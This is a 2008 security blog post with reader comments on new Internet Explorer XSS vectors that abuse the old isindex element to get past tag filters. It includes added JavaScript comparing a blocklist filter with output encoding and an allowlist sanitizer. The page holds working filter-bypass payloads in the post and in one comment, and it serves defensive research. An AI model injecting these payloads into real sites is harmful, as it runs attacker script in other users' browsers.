New XSS vector
Tuesday, 26 August 2008
Yes, an XSS post again. I’m sorry 🙂
I’ve been having fun testing some really good filters (some of the best in the business, IMO) and found a vector that isn’t on rsnake’s XSS cheat sheet. Check it out:-
Only works on IE
<isindex type=image src=1 onerror=alert(1)>
Because IE treats the isindex element (a very old HTML element) as an input tag, you can give it the same attributes an input accepts: type=image makes it an image input, src=1 points at an image that fails to load, and onerror then runs the JavaScript. A filter that only knows about input and img never sees the tag name it is looking for.
Update…
Found another variation, which is pretty cool:-
<isindex action=javascript:alert(1) type=image>
Here the action attribute lands on the form IE builds around the isindex input, so clicking the image input submits that form to the javascript: URL.
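To show why the vectors above slip past a tag blocklist and what a browser actually makes of them, here is an added example (my own code, not from the original post or from any of the filters it tested). The blocklist and its tag names are a hypothetical 2008-style filter written for the demo; the isindex expansion follows the rule in the HTML5 parsing algorithm of that era (an implied form carrying the action, with every other attribute copied onto an input named isindex), which I am assuming matches what IE did internally; the encoder is a generic HTML/attribute encoder, not any library's.

```javascript
// Added example (not code from the original post). A hypothetical 2008-style
// tag blocklist beside an HTML output encoder, run against the isindex vectors
// from the post, plus the isindex -> form/input expansion that explains why
// the vectors work.

// The three payloads from the post (constructed test input).
const ISINDEX_VECTORS = [
  '<isindex type=image src=1 onerror=alert(1)>',
  '<isindex action=javascript:alert(1) type=image>',
  '<isindex type=image onerror=alert(1) src=>',
];

// Hypothetical blocklist filter: strips tags it has heard of and passes the
// rest. isindex is not on the list, so the payload goes straight through.
const BLOCKED_TAGS = ['script', 'img', 'input', 'iframe', 'object', 'embed', 'body', 'svg'];

function blocklistFilter(html) {
  let out = html;
  for (const tag of BLOCKED_TAGS) {
    // removes <tag ...> and </tag>, case-insensitively
    out = out.replace(new RegExp(`</?${tag}\\b[^>]*>`, 'gi'), '');
  }
  return out;
}

// Tag names still present in a string, i.e. what a browser would go on to parse.
function remainingTags(html) {
  return [...html.matchAll(/<([a-zA-Z][a-zA-Z0-9]*)/g)].map((m) => m[1].toLowerCase());
}

// Minimal attribute parser for a single tag (quoted, unquoted and bare
// attributes); enough for the vectors above, not a general HTML tokenizer.
function parseAttrs(attrText) {
  const attrs = {};
  for (const a of attrText.matchAll(/([^\s=]+)(?:=("[^"]*"|'[^']*'|[^\s>]*))?/g)) {
    attrs[a[1].toLowerCase()] = a[2] === undefined ? '' : a[2].replace(/^["']|["']$/g, '');
  }
  return attrs;
}

// What the parser makes of <isindex ...>, following the HTML5 parsing rule of
// the time (assumption: IE's internal handling is not documented here, but the
// post's observation matches this expansion). action goes on an implied
// <form>; every other attribute is copied onto an <input name=isindex>. So
// type/src/onerror land on an input, and action on the form that the image
// input submits when clicked.
function expandIsindex(tag) {
  const m = /^<isindex\b([^>]*)>$/i.exec(tag.trim());
  if (!m) return tag;
  const attrs = parseAttrs(m[1]);
  const formAttrs = 'action' in attrs ? ` action="${attrs.action}"` : '';
  const inputAttrs = Object.entries(attrs)
    .filter(([k]) => !['name', 'action', 'prompt'].includes(k))
    .map(([k, v]) => ` ${k}="${v}"`)
    .join('');
  const prompt = attrs.prompt || 'This is a searchable index. Enter search keywords: ';
  return `<form${formAttrs}><hr><label>${prompt}<input name="isindex"${inputAttrs}></label><hr></form>`;
}

// Output encoding for an HTML text or attribute context: the tag name no
// longer matters, because '<' never reaches the parser as markup.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return s.replace(/[&<>"'\/]/g, (c) => map[c]);
}

function demo() {
  for (const v of ISINDEX_VECTORS) {
    console.log('vector         :', v);
    console.log('after blocklist:', blocklistFilter(v), '-> tags left:', remainingTags(blocklistFilter(v)));
    console.log('browser sees   :', expandIsindex(v));
    console.log('encoded        :', encodeForHtml(v));
  }
}
demo();
```

The point of the contrast: the blocklist returns every isindex payload untouched because it matches on tag names, whereas encoding the untrusted string at output time makes the tag name irrelevant. The expansion also shows the difference between the two vectors: the onerror one fires on its own when the src fails to load, the action one needs the image input to be clicked.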
No. 1 — August 26th, 2008 at 9:16 pm
You can remove the value of the src attribute:
<isindex type=image onerror=alert(1) src=>
(only tested on IE6)
Did you ask rsnake to add this vector?
No. 2 — August 26th, 2008 at 9:25 pm
Also works in IE8
I’ll email him
No. 3 — August 26th, 2008 at 9:54 pm
Emailed rsnake, but they won’t be added to the cheat sheet because there is no new event handler and javascript: is already mentioned.
No. 4 — August 27th, 2008 at 5:17 am
Hi Gareth Heyes,
good job,
it works in IE6/7/8.
No. 5 — August 27th, 2008 at 10:56 pm
If only everyone had the power of
ESAPI.encoder().encodeForHTMLAttribute(String userData);
Great find, good job!
No. 6 — August 28th, 2008 at 10:48 am
@jim
Hey Jim, thanks. Why don’t you put up an online demo of ESAPI like Mario’s smoketest? Then we’ll see how good it is 🙂
No. 7 — August 29th, 2008 at 7:51 am
Hi,
I have an idea for protecting websites against XSS attacks. Why not ban all tags and allow only predefined ones with ‘special’ care? Like, allow img only with a src that starts with http://, or allow a href only if http or https is found.
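As an added example of the allowlist idea in the comment above (my own code, not the commenter’s and not any library’s), here is a small sanitizer that drops every tag it was not told about and only keeps href/src values that start with http:// or https://. The tag list, attribute list and the "required attribute" rule are assumptions chosen for the demo; the isindex payloads from the post are used as input.

```javascript
// Added example (not from the original post or any library): an allowlist
// sanitizer in the spirit of the comment above. Everything not explicitly
// permitted is dropped, and URL-bearing attributes must start with http:// or
// https://. Tag and attribute choices are assumptions made for this demo.

// Validators for attribute values. Reject-by-default: only a plain http(s)
// URL passes; javascript:, data:, entity-encoded schemes and values with
// leading control characters all fail because they do not match the prefix.
const isHttpUrl = (v) => /^https?:\/\/[^\s]+$/i.test(v);
const anyText = () => true;

// Allowed tags, their allowed attributes, attributes a tag cannot appear
// without (an <img> whose src was rejected is dropped, not emitted empty),
// and whether the tag is void (no closing tag).
const POLICY = {
  a:   { attrs: { href: isHttpUrl, title: anyText }, required: ['href'], void: false },
  img: { attrs: { src: isHttpUrl, alt: anyText },    required: ['src'],  void: true },
  b:   { attrs: {}, required: [], void: false },
  i:   { attrs: {}, required: [], void: false },
  p:   { attrs: {}, required: [], void: false },
  br:  { attrs: {}, required: [], void: true },
};

// Conservative text/attribute encoding (re-encodes existing entities, which
// is harmless for security purposes).
function encodeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Minimal attribute parser for one tag's attribute text (demo-grade).
function parseAttrs(attrText) {
  const attrs = {};
  for (const a of attrText.matchAll(/([^\s=]+)(?:=("[^"]*"|'[^']*'|[^\s>]*))?/g)) {
    attrs[a[1].toLowerCase()] = a[2] === undefined ? '' : a[2].replace(/^["']|["']$/g, '');
  }
  return attrs;
}

// Rebuild one tag under the policy, or return '' to drop it. `open` is the
// stack of emitted non-void tags so a closing tag is only emitted for a tag
// that was actually opened.
function rebuildTag(name, attrText, closing, open) {
  const rule = POLICY[name];
  if (!rule) return '';                       // unknown tag (isindex, script, ...) is dropped
  if (closing) {
    const i = open.lastIndexOf(name);
    if (i < 0) return '';
    open.length = i;
    return `</${name}>`;
  }
  const attrs = parseAttrs(attrText);
  const kept = [];
  for (const [k, check] of Object.entries(rule.attrs)) {
    if (k in attrs && check(attrs[k])) kept.push(` ${k}="${encodeText(attrs[k])}"`);
  }
  for (const r of rule.required) {
    if (!kept.some((s) => s.startsWith(` ${r}=`))) return '';  // required attr missing or rejected
  }
  if (!rule.void) open.push(name);
  return `<${name}${kept.join('')}>`;
}

function sanitize(html) {
  const re = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
  const out = [];
  const open = [];
  let last = 0;
  for (const m of html.matchAll(re)) {
    out.push(encodeText(html.slice(last, m.index)));
    out.push(rebuildTag(m[2].toLowerCase(), m[3], m[1] === '/', open));
    last = m.index + m[0].length;
  }
  out.push(encodeText(html.slice(last)));    // a stray '<' in leftover text is encoded too
  return out.join('');
}

// Constructed inputs: the post's vectors plus some benign and borderline markup.
const SAMPLES = [
  '<isindex type=image src=1 onerror=alert(1)>',
  '<isindex action=javascript:alert(1) type=image>',
  '<a href="http://example.com/?a=1&b=2" onclick=alert(1)>link</a>',
  '<a href="javascript:alert(1)">x</a>',
  '<img src=1 onerror=alert(1)>',
  '1 < 2 <b>bold</b>',
];
for (const s of SAMPLES) console.log(JSON.stringify(s), '->', JSON.stringify(sanitize(s)));
```

Because isindex is simply not in the policy, both vectors from the post come out as an empty string without the filter having to know anything about the element; the same holds for any other tag that turns up later. The regex tokenizer is only there to show the policy logic: a production sanitizer has to run on a real HTML parser, otherwise the sanitizer and the browser can disagree about where a tag starts and ends.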
No. 8 — November 10th, 2008 at 11:53 am
Also works in IE8. thx